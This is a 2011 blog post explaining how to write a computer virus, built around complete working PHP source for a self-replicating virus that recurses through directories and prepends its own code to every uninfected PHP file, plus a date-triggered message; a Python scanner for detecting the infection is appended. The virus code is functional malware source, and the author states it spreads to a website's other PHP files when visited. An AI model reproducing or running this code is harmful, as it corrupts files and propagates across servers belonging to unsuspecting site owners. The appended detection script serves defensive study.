How to Create a Computer Virus | cranklin.com

source link: https://cranklin.wordpress.com/2011/11/29/how-to-create-a-computer-virus/

November 29, 2011

I was sick (and bored) this week, and my brain didn’t want to do any work. I was lying in bed with a cold/flu virus, thinking about modern-day computer viruses (or virii for the 90’s hackers… hereinafter referred to as “viruses” for everyone else’s sake) while shaking my head in disappointment. Computer viruses these days are a joke. They’re not very stealthy, they don’t spread very far, and they can be removed far too easily. Once upon a time, viruses were a form of art… and they were ALL written in Assembly. Anything less (or shall I say more) was considered a joke. The traditional computer virus’s job was simple:

1. Search for infectable files.
2. Check for virus signature.
3. If it exists, it’s infected. Keep searching. If not, infect it using the bytes from one of the infected files.
4. Don’t bomb the computer until a trigger of some sort, e.g. a particular date.

And that’s all there is to it. Some consider computer viruses the most primitive form of artificial intelligence because their primary function is to replicate themselves or “spawn” just like any other life form.

Since virus authors today like to write viruses in higher-level languages, I decided to write my own virus in a higher-level language… nevertheless, keeping the traditional methods of replication and bombing. I wrote it in PHP and I did this for fun. It took me no longer than the duration of 2 Twilight Zone (original series) episodes. It’s educational, but please use caution if you run it. It IS a working virus and it WILL recurse directories and infect other PHP files… which in turn will infect other PHP files. The “bomb” portion of the virus doesn’t do anything malicious… it just prints “HAPPY BIRTHDAY CRANKY!” to the screen on my actual birthday.

The interesting thing about writing a virus in PHP is that a) it can run on Windows, OS X, and *nix and b) once it infects a website, any PHP file that is run as a direct result of a user visiting your website will cause the virus to run and infect other PHP files and, if triggered on the correct day, say “HAPPY BIRTHDAY CRANKY!” on the said website… unless, of course, it runs into file permission restrictions.


<?php
define("SIGNATURE", "CRANKY'S PHP VIRUS");
// determine whether backslash or forward slashes are used
define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
$linenumber = __LINE__;
define("STARTLINE",$linenumber-4);
define("ENDLINE",$linenumber+45);
function search($path){
    $ret = "";
    $fp = opendir($path);
    while($f = readdir($fp)){
        if( preg_match("#^\.+$#", $f) ) continue; // ignore symbolic links
        $file_full_path = $path.SLASH.$f;
        if(is_dir($file_full_path)) { // if it's a directory, recurse
            $ret .= search($file_full_path);
        } else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
            $ret .= $file_full_path."\n";
        }   
    }   
    return $ret;
}
function infect($filestoinfect){
    $handle = @fopen(__FILE__, "r");
    $counter = 1;
    $virusstring = ""; 
    while(($buffer=fgets($handle,4096)) !== false){
        if($counter>=STARTLINE && $counter<=ENDLINE){
            $virusstring .= $buffer;
        }   
        $counter++;
    }   
    fclose($handle);
    $filesarray = array();
    $filesarray = explode("\n",$filestoinfect);
    foreach($filesarray AS $v){
        if(substr($v,-4)===".php"){
            $filecontents = file_get_contents($v);
            file_put_contents($v,$virusstring.$filecontents);
        }
    }
}
function bomb(){
    if(date("md") == 0125){
        echo "HAPPY BIRTHDAY CRANKY!";
    }
}
$filestoinfect = search(__DIR__);
infect($filestoinfect);
bomb();
?>

You can also download the source code here.

To test it out, I wrote a bunch of short and simple PHP files and placed them in the same folder. Then I made a subfolder and put some PHP files in there. Then I made a subsubfolder and put some PHP files in there as well. I ran the virus and what do you know? It infected ALL the PHP files. By changing a couple of characters in the regex, I can make this recurse up the directory structure as well… but I didn’t. Enjoy, be safe, and don’t be a malicious script kiddie.
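A defender's view of the signature check and prepend-style infection described above, as an added example that is not part of the original post: a Python scanner that flags .php files containing the marker string from the listing, and also groups files that begin with an identical leading block. The PREFIX_LINES threshold, the function names and the sample tree are assumptions constructed for this example; the sample files hold inert placeholder text only.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

SIGNATURE = b"CRANKY'S PHP VIRUS"  # marker string taken from the listing on this page
PREFIX_LINES = 20                  # assumption: size of the leading block to compare

def scan(root):
    """Return (signature_hits, shared_prefix_groups) for .php files under root."""
    hits, by_prefix = [], defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: nothing to inspect
            # The listing checks with stristr(), so match case-insensitively too.
            if SIGNATURE.lower() in data.lower():
                hits.append(path)
            lines = data.splitlines()
            if len(lines) >= PREFIX_LINES:
                digest = hashlib.sha256(b"\n".join(lines[:PREFIX_LINES])).hexdigest()
                by_prefix[digest].append(path)
    # Two or more files opening with the same block suggests prepended code.
    groups = sorted(sorted(p) for p in by_prefix.values() if len(p) > 1)
    return sorted(hits), groups

def build_sample_tree(root):
    """Constructed sample data: inert stand-in text, not the page's code."""
    stub = ("<?php\ndefine(\"SIGNATURE\", \"CRANKY'S PHP VIRUS\");\n"
            + "".join(f"// inert placeholder line {i}\n" for i in range(PREFIX_LINES))
            + "?>\n")
    os.makedirs(os.path.join(root, "sub"))
    files = {
        "index.php": stub + "<?php echo 'home'; ?>\n",
        os.path.join("sub", "form.php"): stub + "<?php echo 'form'; ?>\n",
        "clean.php": "<?php echo 'clean'; ?>\n",
        "notes.txt": "CRANKY'S PHP VIRUS mentioned in a non-PHP file\n",
    }
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan(tmp))
```

The signature match only catches files carrying this exact marker, so the shared-prefix grouping is the more general signal; legitimate files that share a long license header will also group together and need a manual look.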

